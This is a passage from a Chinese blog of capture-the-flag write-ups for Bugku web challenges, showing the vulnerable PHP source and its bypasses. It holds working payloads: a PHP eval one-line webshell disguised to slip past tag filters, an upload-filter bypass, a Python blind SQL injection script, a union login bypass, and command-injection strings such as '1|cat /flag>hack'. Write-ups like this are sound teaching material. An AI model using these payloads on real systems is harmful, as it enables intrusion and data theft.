<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line"><span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>] = urldecode(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]);</span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&#x27;flag&#123;xxxxxxxxxxxxxxxxxx&#125;&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;uname&#x27;</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$_GET</span>[<span class="string">&#x27;uname&#x27;</span>] == <span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>])</span><br><span class="line"></span><br><span class="line">        <span class="keyword">print</span> <span class="string">&#x27;passwd can not be uname.&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (sha1(<span class="variable">$_GET</span>[<span class="string">&#x27;uname&#x27;</span>]) === sha1(<span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>])&amp;(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]==<span class="string">&#x27;margin&#x27;</span>))</span><br><span class="line"></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Flag: &#x27;</span>.<span class="variable">$flag</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">print</span> <span class="string">&#x27;sorry!&#x27;</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>这里有新整出来一个加密sha1函数，感觉跟md5类似，这次不是弱类型比较了，但是可以用数组绕过，都为NULL值即相等。</p>
<p><img src="/2021/03/22/bugku/22.png"></p>
<h3 id="web30"><a href="#web30" class="headerlink" title="web30"></a>web30</h3><p>提示：txt</p>
<p>访问一下flag.txt返回bugku。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">extract(<span class="variable">$_GET</span>);</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$ac</span>))</span><br><span class="line">&#123;</span><br><span class="line"><span class="variable">$f</span> = trim(file_get_contents(<span class="variable">$fn</span>));</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$ac</span> === <span class="variable">$f</span>)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt;This is flag:&quot;</span> .<span class="string">&quot; <span class="subst">$flag</span>&lt;/p&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt;sorry!&lt;/p&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>特别注意函数file_get_contents把整个文件读入一个字符串，读取的参数fn要为flag.txt文件，这里根据前面的提示，构造payload。</p>
<p><img src><img src="/2021/03/22/bugku/23.png" alt="23"></p>
<h3 id="web31"><a href="#web31" class="headerlink" title="web31"></a>web31</h3><p>提示：好像需要管理员</p>
<p>尝试了修改ip访问，都不行，扫一下目录吧</p>
<p>扫到了robots.txt，访问，发现resusl.php，再访问。</p>
<p><img src="/2021/03/22/bugku/24.png"></p>
<p>这里看见IP地址又向往这个方向整，结果错了，关键在提交x参数这句，刚开始尝试密码为bugkuctf. 错误了，再试一下admin就出来了。</p>
<p><img src="/2021/03/22/bugku/25.png"></p>
<p>这题方向太重要了，方向错了，尝试很久都不出来。</p>
<h3 id="web32"><a href="#web32" class="headerlink" title="web32"></a>web32</h3><p>有关文件上传的，这里尝试了很多，少修改了第一个Content-Type值。</p>
<p>第一个multipart/form-data专门用于有效的传输文件，通过大小写绕过。</p>
<p>第二个Conten-Type修改文件类型为image/jpeg即可。</p>
<p>这里的php后缀修改只有php4没被过滤(这个有点坑)，</p>
<p>由于看不到源码，需要经过不断测试。</p>
<p><img src><img src="/2021/03/22/bugku/26.png" alt="26"></p>
<p>上传成功后连接蚁剑获得flag。</p>
<p>附上源码，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;?php </span><br><span class="line">$flag = &quot;flag&#123;test&#125;&quot;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;form action=&quot;index.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">My name is margin,give me a image file not a php&lt;br&gt;</span><br><span class="line">&lt;br&gt;</span><br><span class="line">&lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot; /&gt; </span><br><span class="line">&lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot; /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">function global_filter()&#123;</span><br><span class="line">	$type =  $_SERVER[&quot;CONTENT_TYPE&quot;];</span><br><span class="line">	if (strpos($type,&quot;multipart/form-data&quot;) !== False)&#123;//这里要过滤</span><br><span class="line">		$file_ext =  substr($_FILES[&quot;file&quot;][&quot;name&quot;], strrpos($_FILES[&quot;file&quot;][&quot;name&quot;], &#x27;.&#x27;)+1);</span><br><span class="line">        $file_ext = strtolower($file_ext);</span><br><span class="line">		if (stripos($file_ext,&quot;php&quot;) !== False)&#123;</span><br><span class="line">			die(&quot;Invalid File&lt;br /&gt;&quot;);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">global_filter();</span><br><span class="line">if ((stripos($_FILES[&quot;file&quot;][&quot;type&quot;],&#x27;image&#x27;)!== False) &amp;&amp; ($_FILES[&quot;file&quot;][&quot;size&quot;] &lt; 10*1024*1024))&#123;</span><br><span class="line">	if ($_FILES[&quot;file&quot;][&quot;error&quot;] == 0)&#123;</span><br><span class="line">		$file_ext =  substr($_FILES[&quot;file&quot;][&quot;name&quot;], strrpos($_FILES[&quot;file&quot;][&quot;name&quot;], &#x27;.&#x27;)+1);</span><br><span class="line">        $file_ext = strtolower($file_ext);</span><br><span class="line">        $allowexts = array(&#x27;jpg&#x27;,&#x27;gif&#x27;,&#x27;jpeg&#x27;,&#x27;bmp&#x27;,&#x27;php4&#x27;);</span><br><span class="line">        if(!in_array($file_ext,$allowexts))&#123;</span><br><span class="line">            die(&quot;give me a image file not a php&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">		$_FILES[&quot;file&quot;][&quot;name&quot;]=&quot;bugku&quot;.date(&#x27;dHis&#x27;).&quot;_&quot;.rand(1000,9999).&quot;.&quot;.$file_ext;</span><br><span class="line"></span><br><span class="line">	    if (file_exists(&quot;upload/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;]))&#123;</span><br><span class="line">	    	echo $_FILES[&quot;file&quot;][&quot;name&quot;] . &quot; already exists. &lt;br /&gt;&quot;;</span><br><span class="line">	    &#125;</span><br><span class="line">	    else&#123;</span><br><span class="line">	    	if (!file_exists(&#x27;./upload/&#x27;))&#123;</span><br><span class="line">	    		mkdir (&quot;./upload/&quot;);</span><br><span class="line">                system(&quot;chmod 777 /var/www/html/upload&quot;);</span><br><span class="line">	    	&#125;</span><br><span class="line">	    	move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;],&quot;upload/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">                echo &quot;Upload Success&lt;br&gt;&quot;;</span><br><span class="line">                $filepath = &quot;upload/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;];</span><br><span class="line">	      	echo &quot;Stored in: &quot; .&quot;&lt;a href=&#x27;&quot; . $filepath . &quot;&#x27; target=&#x27;_blank&#x27;&gt;&quot; . $filepath . &quot;&lt;br /&gt;&quot;;</span><br><span class="line">	    &#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">	if($_FILES[&quot;file&quot;][&quot;size&quot;] &gt; 0)&#123;</span><br><span class="line">		echo &quot;You was catched! :) &lt;br /&gt;&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="web33"><a href="#web33" class="headerlink" title="web33"></a>web33</h3><p>提示：fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=</p>
<p>经过base64加密。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">encrypt</span>(<span class="params"><span class="variable">$data</span>,<span class="variable">$key</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$key</span> = md5(<span class="string">&#x27;ISCC&#x27;</span>);</span><br><span class="line">    <span class="variable">$x</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="variable">$len</span> = strlen(<span class="variable">$data</span>);</span><br><span class="line">    <span class="variable">$klen</span> = strlen(<span class="variable">$key</span>);</span><br><span class="line">    <span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$len</span>; <span class="variable">$i</span>++) &#123; </span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$x</span> == <span class="variable">$klen</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="variable">$x</span> = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$char</span> .= <span class="variable">$key</span>[<span class="variable">$x</span>];</span><br><span class="line">        <span class="variable">$x</span>+=<span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$len</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">        <span class="variable">$str</span> .= chr((ord(<span class="variable">$data</span>[<span class="variable">$i</span>]) + ord(<span class="variable">$char</span>[<span class="variable">$i</span>])) % <span class="number">128</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> base64_encode(<span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这一看就知道需要解密，写代码能力还偏弱，参考了一下大佬<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41209264/article/details/112255412">https://blog.csdn.net/qq_41209264/article/details/112255412</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$str</span> = <span class="string">&quot;fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=&quot;</span>;</span><br><span class="line">    <span class="variable">$data</span> = base64_decode(<span class="variable">$str</span>);<span class="comment">//与return base64相对于，先解码。</span></span><br><span class="line">	<span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span> &lt; strlen(<span class="variable">$data</span>); <span class="variable">$i</span>++) &#123; </span><br><span class="line">			<span class="keyword">echo</span> ord(<span class="variable">$data</span>[<span class="variable">$i</span>]).<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="variable">$key</span> = md5(<span class="string">&#x27;ISCC&#x27;</span>);</span><br><span class="line">    <span class="variable">$x</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="variable">$len</span> = strlen(<span class="variable">$data</span>);</span><br><span class="line">    <span class="variable">$klen</span> = strlen(<span class="variable">$key</span>);</span><br><span class="line">    <span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$len</span>; <span class="variable">$i</span>++) &#123; </span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$x</span> == <span class="variable">$klen</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="variable">$x</span> = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$char</span> .= <span class="variable">$key</span>[<span class="variable">$x</span>];</span><br><span class="line">        <span class="variable">$x</span>+=<span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$char</span>.<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">	<span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$len</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">        <span class="variable">$num</span> = (ord(<span class="variable">$data</span>[<span class="variable">$i</span>]) - ord(<span class="variable">$char</span>[<span class="variable">$i</span>])) % <span class="number">128</span>;</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$num</span> &lt; <span class="number">0</span>)&#123;</span><br><span class="line">			<span class="variable">$flag</span> .= chr(<span class="variable">$num</span>+<span class="number">128</span>);</span><br><span class="line">		&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="variable">$flag</span> .= chr(<span class="variable">$num</span>);</span><br><span class="line">		&#125;</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">echo</span> <span class="variable">$flag</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="web34"><a href="#web34" class="headerlink" title="web34"></a>web34</h3><p>描述：文件包含。</p>
<p>这里上传了一句话木马，然后利用文件包含漏洞解析一句话木马，结果&lt;/? /php 和/?&gt;都被过滤了。</p>
<p><img src="/2021/03/22/bugku/26.png"></p>
<p><strong>这里的file要包含upload路径，不然回显都是空白。</strong></p>
<p>这里针对过滤php开头标志绕过手法：</p>
<p><code>&lt;script language=&quot;php&quot;&gt;@eval($_POST[1]);&lt;/script&gt;</code></p>
<p>即可绕过。本题很重要的有两个，首先文件包含漏洞解析的时候路径要包含upload，第二个要清楚过滤了什么。</p>
<h3 id="web35"><a href="#web35" class="headerlink" title="web35"></a>web35</h3><p>查看源码，发现admin.css，访问。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* try ?10800 */</span></span><br><span class="line"><span class="selector-tag">body</span> &#123;</span><br><span class="line">    <span class="attribute">background-color</span>: <span class="number">#C1DEE8</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="selector-tag">p</span> &#123; <span class="attribute">margin</span>: <span class="number">20px</span> <span class="number">0</span> <span class="number">0</span>; &#125;</span><br><span class="line"></span><br><span class="line"><span class="selector-class">.container</span> &#123;</span><br><span class="line">    <span class="attribute">background-color</span>: <span class="number">#ffffff</span>;</span><br><span class="line">    <span class="attribute">border-radius</span>: <span class="number">10px</span>;</span><br><span class="line">    <span class="attribute">width</span>: <span class="number">20%</span>;</span><br><span class="line">    <span class="attribute">height</span>: <span class="number">20%</span>;</span><br><span class="line">    <span class="attribute">margin</span>: <span class="number">10%</span> auto;</span><br><span class="line">    <span class="attribute">padding</span>: <span class="number">30px</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[type=text]</span>, <span class="selector-tag">input</span><span class="selector-attr">[type=password]</span> &#123;</span><br><span class="line">    <span class="attribute">width</span>: <span class="number">100%</span>;</span><br><span class="line">    <span class="attribute">height</span>: <span class="number">40px</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="selector-tag">input</span><span class="selector-attr">[type=button]</span> &#123;</span><br><span class="line">    <span class="attribute">width</span>: <span class="number">60%</span>;</span><br><span class="line">    <span class="attribute">height</span>: <span class="number">40px</span>;</span><br><span class="line">    <span class="attribute">border-radius</span>: <span class="number">20px</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>尝试一下?10800，访问，得到php代码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$KEY=&#x27;ctf.bugku.com&#x27;;</span><br><span class="line">include_once(&quot;flag.php&quot;);</span><br><span class="line">$cookie = $_COOKIE[&#x27;BUGKU&#x27;];</span><br><span class="line">if(isset($_GET[&#x27;10800&#x27;]))&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">elseif (unserialize($cookie) === &quot;$KEY&quot;)</span><br><span class="line">&#123;   </span><br><span class="line">    echo &quot;$flag&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;</span><br><span class="line">&lt;title&gt;Login&lt;/title&gt;</span><br><span class="line">&lt;link rel=&quot;stylesheet&quot; href=&quot;admin.css&quot; type=&quot;text/css&quot;&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;br&gt;</span><br><span class="line">&lt;div class=&quot;container&quot; align=&quot;center&quot;&gt;</span><br><span class="line">  &lt;form method=&quot;POST&quot; action=&quot;#&quot;&gt;</span><br><span class="line">    &lt;p&gt;&lt;input name=&quot;user&quot; type=&quot;text&quot; placeholder=&quot;Username&quot;&gt;&lt;/p&gt;</span><br><span class="line">    &lt;p&gt;&lt;input name=&quot;password&quot; type=&quot;password&quot; placeholder=&quot;Password&quot;&gt;&lt;/p&gt;</span><br><span class="line">    &lt;p&gt;&lt;input value=&quot;Login&quot; type=&quot;button&quot;/&gt;&lt;/p&gt;</span><br><span class="line">  &lt;/form&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>



<p>看了一下代码，把cookie值反序列化后要和参数KEY值相等，到php在线编辑器中进行序列化。</p>
<p><img src="/2021/03/22/bugku/27.png"></p>
<p><em><strong>直接把值传入cookie:BUGKU=s:13:”ctf.bugku.com”;就可以了，</strong></em></p>
<p><em><strong>函数$_COOKIE()创建了名为BUGKU的变量。</strong></em></p>
<p><em><strong>这里有个函数天坑，include_once()只包含一次，所以别随便就访问flag.php会导致你后面都没有结果，还尝试了伪协议读取文件，浪费了很多时间，如果不小心包含了文件，重开浏览器就可以了。</strong></em></p>
<h3 id="web36"><a href="#web36" class="headerlink" title="web36"></a>web36</h3><p>描述：全都过滤了。</p>
<p>提示：!,!=,=,+,-,^,%</p>
<p>进入登陆页面，扫描一下目录，发现了include和images，分别访问，访问images发现图片</p>
<p><img src="/2021/03/22/bugku/28.png"></p>
<p>看见函数mid，这里应该需要使用盲注，上网搜了大佬的盲注脚本。</p>
<p>这里需要知道：<strong>0和任何数异或等于任何数</strong>，如果盲注密码正确，返回1，admin正确，返回password错误。</p>
<p>这样admin^0就会返回admin</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">session = requests.Session()</span><br><span class="line">url=<span class="string">&quot;http://114.67.246.176:15507/login.php&quot;</span></span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">250</span>):</span><br><span class="line">        left=<span class="number">32</span></span><br><span class="line">        right=<span class="number">128</span></span><br><span class="line">        mid=(left+right)//<span class="number">2</span></span><br><span class="line">        <span class="keyword">while</span>(left&lt;right):</span><br><span class="line">                payload=<span class="string">&quot;admin&#x27;^((ascii(mid((select(group_concat(passwd)))from(%s)))&gt;%s))^&#x27;1&quot;</span>%(i,mid)</span><br><span class="line">                data = &#123;<span class="string">&#x27;uname&#x27;</span>: payload, <span class="string">&#x27;passwd&#x27;</span>: <span class="string">&#x27;admin&#x27;</span>&#125;</span><br><span class="line">                res = requests.post(url, data=data)</span><br><span class="line">                <span class="keyword">if</span> <span class="string">&#x27;password&#x27;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">                        left=mid+<span class="number">1</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                        right=mid</span><br><span class="line">                mid=(left+right)//<span class="number">2</span></span><br><span class="line">        <span class="keyword">if</span>(mid==<span class="number">32</span> <span class="keyword">or</span> mid==<span class="number">127</span>):</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        flag=flag+<span class="built_in">chr</span>(mid)</span><br><span class="line">        <span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>

<p>参考连接<a target="_blank" rel="noopener" href="https://blog.csdn.net/EC_Carrot/article/details/111830886">https://blog.csdn.net/EC_Carrot/article/details/111830886</a></p>
<p><img src="/2021/03/22/bugku/29.png"></p>
<p>获得字符串，猜测应该是md5加密，解密得到 bugkuctf。</p>
<p>登陆成功ls执行语句，发现空格被过滤了，在linux里面有很多方式可以代替空格：</p>
<ul>
<li><p>cat${IFS}flag.txt</p>
</li>
<li><p>cat$IFS$9flag.txt</p>
</li>
<li><p>cat&lt;flag.txt</p>
</li>
<li><p>cat&lt;&gt;flag.txt</p>
<p>这里输入cat&lt;/flag获得flag。</p>
</li>
</ul>
<h3 id="web37"><a href="#web37" class="headerlink" title="web37"></a>web37</h3><p>扫描目录，发现css，访问。</p>
<p>好像没啥用，这里用sqlmap跑一下，可以跑，结果到了获得账户和密码时为空。</p>
<p>再用burp抓包，发现有个小tip，</p>
<p><img src="/2021/03/22/bugku/30.png"></p>
<p>base64解密得到，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT username,password FROM admin WHERE username=&#x27;&quot;.$username.&quot;&#x27;&quot;;</span><br><span class="line">if (!empty($row) &amp;&amp; $row[&#x27;password&#x27;]===md5($password))&#123;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>代码审计，要求查询结果不为空，并且password值要经md5加密。</p>
<p>构造uname=admin’ union select 1,md5(1)#&amp;passwd=1绕过登陆页面。(这里的union根据提示得到，为了使查询结果不为空。)</p>
<p>到了进程监控系统，这里有两种方法，第一种写入文件二次返回查看结果，第二种反弹shell。</p>
<p>这里先介绍法一：</p>
<p><img src="/2021/03/22/bugku/31.png"></p>
<p>通过|执行命令，把文件写入hack，然后访问hack。</p>
<p>再执行命令<code>1|cat /flag&gt;hack</code> 获得flag。这对于命令操作指令熟练程度很重要，需要多加学习。</p>
<h3 id="web38"><a href="#web38" class="headerlink" title="web38"></a>web38</h3><p>提示：基于布尔的SQL盲注</p>
<p>从36到现在，开头都是一个登陆页面，试一下前面的密码，出来了。。。</p>
<p>还是要老老实实做一下，先用sqlmap爆破一下，跑不出来，还是要写脚本。</p>
<p>参考web36爆破。</p>
<h3 id="web39"><a href="#web39" class="headerlink" title="web39"></a>web39</h3><p>提示：CBC字节翻转攻击</p>
<p>扫描目录，扫到.index.php.swp，访问一下，跳到文件下载。</p>
<p>这题和后面的题目都比较难，先放一放。</p>

    </div>

    
    
    
<div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
